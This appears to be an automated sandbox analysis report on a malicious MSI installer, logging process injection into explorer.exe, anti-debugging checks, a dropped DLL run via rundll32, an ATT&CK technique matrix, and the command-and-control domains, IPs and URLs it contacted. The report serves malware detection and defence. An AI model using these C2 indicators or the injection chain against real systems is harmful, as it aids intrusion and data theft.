                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F3D0A5 IsDebuggerPresent,OutputDebugStringW,4_2_00F3D0A5
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F62DCC mov ecx, dword ptr fs:[00000030h]4_2_00F62DCC
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F6AD78 mov eax, dword ptr fs:[00000030h]4_2_00F6AD78
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F32310 GetProcessHeap,4_2_00F32310
                  Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIA029.tmp "C:\Windows\Installer\MSIA029.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\vierm_soft_x64.dll, GetDeepDVCStateJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F533A8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F533A8
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F5353F SetUnhandledExceptionFilter,4_2_00F5353F
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F52968 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,4_2_00F52968
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F56E1B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,4_2_00F56E1B
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_00000001800402A0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00000001800402A0
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_000000018005C2BC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_000000018005C2BC

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 82.115.223.39 8041Jump to behavior
                  Source: C:\Windows\explorer.exeNetwork Connect: 188.114.97.3 443Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeNetwork Connect: 80.78.24.30 8041Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeMemory allocated: C:\Windows\explorer.exe base: F20000 protect: page execute and read and writeJump to behavior
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_3_00007DF457370100 VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,6_3_00007DF457370100
                  Source: C:\Windows\System32\rundll32.exeCode function: 6_2_0000000273F41380 Sleep,SleepEx,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,WaitForSingleObject,6_2_0000000273F41380
                  Source: C:\Windows\System32\rundll32.exeThread created: C:\Windows\explorer.exe EIP: F20000Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: F20000 value starts with: 4D5AJump to behavior
                  Source: C:\Windows\System32\rundll32.exeMemory written: PID: 4056 base: F20000 value: 4DJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: target process: unknownJump to behavior
                  Source: C:\Windows\System32\rundll32.exeThread register set: 7656 1Jump to behavior
                  Source: C:\Windows\System32\rundll32.exeMemory written: C:\Windows\explorer.exe base: F20000Jump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F352F0 GetWindowsDirectoryW,GetForegroundWindow,ShellExecuteExW,ShellExecuteExW,ShellExecuteExW,GetModuleHandleW,GetModuleHandleW,GetProcAddress,GetProcAddress,AllowSetForegroundWindow,GetModuleHandleW,GetProcAddress,Sleep,Sleep,EnumWindows,BringWindowToTop,WaitForSingleObject,GetExitCodeProcess,4_2_00F352F0
                  Source: explorer.exe, 00000009.00000003.3081124828.0000000009021000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                  Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                  Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: ?Program Manager
                  Source: explorer.exe, 00000009.00000000.1789616621.0000000000C59000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3794284200.0000000000C59000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 1Progman
                  Source: explorer.exe, 00000009.00000000.1790168555.0000000001441000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000002.3805319018.0000000001441000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F535A9 cpuid 4_2_00F535A9
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F6E0C6
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F6E1AC
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F67132
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: EnumSystemLocalesW,4_2_00F6E111
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,4_2_00F6E237
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoEx,4_2_00F523F8
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,4_2_00F6E48A
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_00F6E5B3
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,4_2_00F6E6B9
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetLocaleInfoW,4_2_00F676AF
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,4_2_00F6E788
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,4_2_00F6DE24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,6_2_0000000180053038
                  Source: C:\Windows\System32\rundll32.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,6_2_0000000180052534
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180052904
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_00000001800529D4
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,6_2_0000000180048A24
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047A78
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047BBC
                  Source: C:\Windows\System32\rundll32.exeCode function: EnumSystemLocalesW,6_2_0000000180047C44
                  Source: C:\Windows\System32\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,6_2_0000000180052E38
                  Source: C:\Windows\System32\msiexec.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F537D5 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,4_2_00F537D5
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F28D3C GetUserNameA,wsprintfA,9_2_00F28D3C
                  Source: C:\Windows\Installer\MSIA029.tmpCode function: 4_2_00F67B1F GetTimeZoneInformation,4_2_00F67B1F
                  Source: C:\Windows\explorer.exeCode function: 9_2_00F300E8 RtlGetVersion,9_2_00F300E8

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2700000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4056, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2700000.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 6.2.rundll32.exe.16ad2750000.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000006.00000002.3805911238.0000016AD2750000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000002.3805853254.0000016AD2700000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD2873000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788619377.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788490722.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000006.00000003.1788405088.0000016AD28A2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 7656, type: MEMORYSTR
                  Source: Yara matchFile source: 00000009.00000002.3810547319.000000000892C000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: explorer.exe PID: 4056, type: MEMORYSTR
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | 1 Replication Through Removable Media | 1 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 21 Input Capture | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 1 Ingress Tool Transfer | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 11 Peripheral Device Discovery | Remote Desktop Protocol | 21 Input Capture | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 92 Process Injection | 2 Obfuscated Files or Information | Security Account Manager | 1 Account Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 11 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 2 File and Directory Discovery | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 File Deletion | LSA Secrets | 34 System Information Discovery | SSH | Keylogging | 113 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 121 Masquerading | Cached Domain Credentials | 21 Security Software Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 11 Virtualization/Sandbox Evasion | DCSync | 11 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 92 Process Injection | Proc Filesystem | 3 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 Rundll32 | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | Dynamic API Resolution | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | Stripped Payloads | Input Capture | 1 System Network Configuration Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
[Behavior graph: ID 1525187; Sample: das.msi; Startdate: 03/10/2024; Architecture: WINDOWS; Score: 100. Nodes: msiexec.exe drops C:\Windows\Installer\MSIA029.tmp, C:\Windows\Installer\MSI9F0E.tmp and C:\Users\user\AppData\...\vierm_soft_x64.dll and starts MSIA029.tmp; rundll32.exe contacts greshunka.com (82.115.223.39) and bazarunet.com (80.78.24.30) and injects into explorer.exe, which contacts isomicrotich.com (188.114.97.3, port 443).]

Source | Detection | Scanner | Label | Link
das.msi | 0% | ReversingLabs | |

Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\vierm_soft_x64.dll | 8% | ReversingLabs | |
C:\Windows\Installer\MSI9E30.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI9EBE.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI9EEE.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSI9F0E.tmp | 0% | ReversingLabs | |
C:\Windows\Installer\MSIA029.tmp | 0% | ReversingLabs | |

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label | Link
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV | 0% | URL Reputation | safe |
https://api.msn.com:443/v1/news/Feed/Windows? | 0% | URL Reputation | safe |
https://excel.office.com | 0% | URL Reputation | safe |
https://word.office.com | 0% | URL Reputation | safe |
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings | 0% | URL Reputation | safe |
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
https://outlook.com | 0% | URL Reputation | safe |
https://android.notify.windows.com/iOS | 0% | URL Reputation | safe |
http://schemas.micro | 0% | URL Reputation | safe |
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew | 0% | URL Reputation | safe |
http://x1.c.lencr.org/0 | 0% | URL Reputation | safe |
http://x1.i.lencr.org/0 | 0% | URL Reputation | safe |

Name | IP | Active | Malicious | Antivirus Detection | Reputation
isomicrotich.com | 188.114.97.3 | true | true | | unknown
greshunka.com | 82.115.223.39 | true | true | | unknown
tiguanin.com | 80.78.24.30 | true | true | | unknown
bazarunet.com | 80.78.24.30 | true | true | | unknown

Name | Malicious | Antivirus Detection | Reputation
https://isomicrotich.com/test/ | true | | unknown
https://opewolumeras.com/test/ | true | | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
                                                                                unknown
                                                                                https://bazarunet.com:8041/bazar.phpRrundll32.exe, 00000006.00000003.1608485386.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1720996678.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://tiguanin.com:8041/admin.phporundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://greshunka.com/S%rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&ocexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://bazarunet.com:8041/Yrundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://isomicrotich.com/test/rexplorer.exe, 00000009.00000002.3816713728.000000000C4A3000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://tiguanin.com:8041/bazar.phpiP5rundll32.exe, 00000006.00000002.3806960188.0000016AD28D3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://wns.windows.com/explorer.exe, 00000009.00000000.1792832688.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.00000000090F2000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3074047960.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://isomicrotich.com/test/sexplorer.exe, 00000009.00000003.3078648933.000000000C4CC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://greshunka.com/rundll32.exe, 00000006.00000003.2831885179.0000016AD2814000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2818000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://isomicrotich.com/5117-2476756634-1003explorer.exe, 00000009.00000003.3078923306.000000000C12D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://bazarunet.com:8041/s%rundll32.exe, 00000006.00000003.1720996678.0000016AD2816000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        https://bazarunet.com:8041/bazar.phpCrundll32.exe, 00000006.00000003.1558572897.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          unknown
                                                                                                          https://greshunka.com:8041/bazar.phperundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://word.office.comexplorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            https://bazarunet.com:8041/net.com:8041/admin.phprundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                              unknown
                                                                                                              https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              https://bazarunet.com:8041/Prundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://tiguanin.com:8041/azar.phprundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    http://r10.o.lencr.org0#rundll32.exe, 00000006.00000003.2769645862.0000016AD28B2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2868000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788292595.0000016AD2853000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2441139413.0000016AD28BE000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1788308588.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2529789564.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1850989548.0000016AD2848000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1812614534.0000016AD2852000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      unknown
                                                                                                                      https://bazarunet.com:8041/admin.phpCryptographyrundll32.exe, 00000006.00000003.2529789564.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        unknown
                                                                                                                        https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://bazarunet.com:8041/:rundll32.exe, 00000006.00000003.2529789564.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://outlook.comexplorer.exe, 00000009.00000002.3816713728.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1795302948.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          https://greshunka.com:8041/bazar.phprundll32.exe, 00000006.00000002.3806003596.0000016AD27E6000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3806003596.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3320385822.0000016AD28BD000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.3318968115.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://isomicrotich.com/3explorer.exe, 00000009.00000002.3811134225.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              https://bazarunet.com:8041/bazar.phprundll32.exe, 00000006.00000003.1551602023.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000002.3805690913.0000016AD0E25000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.1615547549.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                https://isomicrotich.com/test/Eexplorer.exe, 00000009.00000002.3811134225.00000000090F2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://tiguanin.com:8041/bazar.phpMrundll32.exe, 00000006.00000003.2831581713.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    unknown
                                                                                                                                    https://tiguanin.com:8041/bazar.phpKrundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://android.notify.windows.com/iOSexplorer.exe, 00000009.00000003.2277712034.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1792832688.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      unknown
                                                                                                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 00000009.00000000.1792832688.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.3811134225.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.2277712034.0000000008F4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000003.3079591832.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000009.00000002.3808408882.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1791266554.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          https://tiguanin.com:8041/admin.php/4Qrundll32.exe, 00000006.00000003.1543502588.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://greshunka.com:8041/bazar.php6rundll32.exe, 00000006.00000003.3320385822.0000016AD2825000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2831581713.0000016AD2825000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              unknown
                                                                                                                                              https://www.advancedinstaller.comdas.msi, MSI9E30.tmp.2.dr, 6a9d65.msi.2.dr, MSI9F0E.tmp.2.dr, MSI9EEE.tmp.2.dr, MSI9EBE.tmp.2.dr, MSIA029.tmp.2.dr, MSI9F7C.tmp.2.drfalse
                                                                                                                                                unknown
                                                                                                                                                https://isomicrotich.com/test/7explorer.exe, 00000009.00000003.3081083635.000000000325F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  https://bazarunet.com:8041/in.com:8041/rundll32.exe, 00000006.00000002.3806003596.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    unknown
                                                                                                                                                    https://greshunka.com:8041/rundll32.exe, 00000006.00000003.2241985447.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000006.00000003.2769645862.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      unknown
                                                                                                                                                      https://tiguanin.com:8041/bazar.phpVrundll32.exe, 00000006.00000003.2831581713.0000016AD2884000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        unknown
                                                                                                                                                        https://bazarunet.com:8041/%rundll32.exe, 00000006.00000002.3806003596.0000016AD28A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          https://tiguanin.com:8041/bazar.phpTrundll32.exe, 00000006.00000003.1707394082.0000016AD27F2000.00000004.00000020.00020000.00000000.sdmpfalse
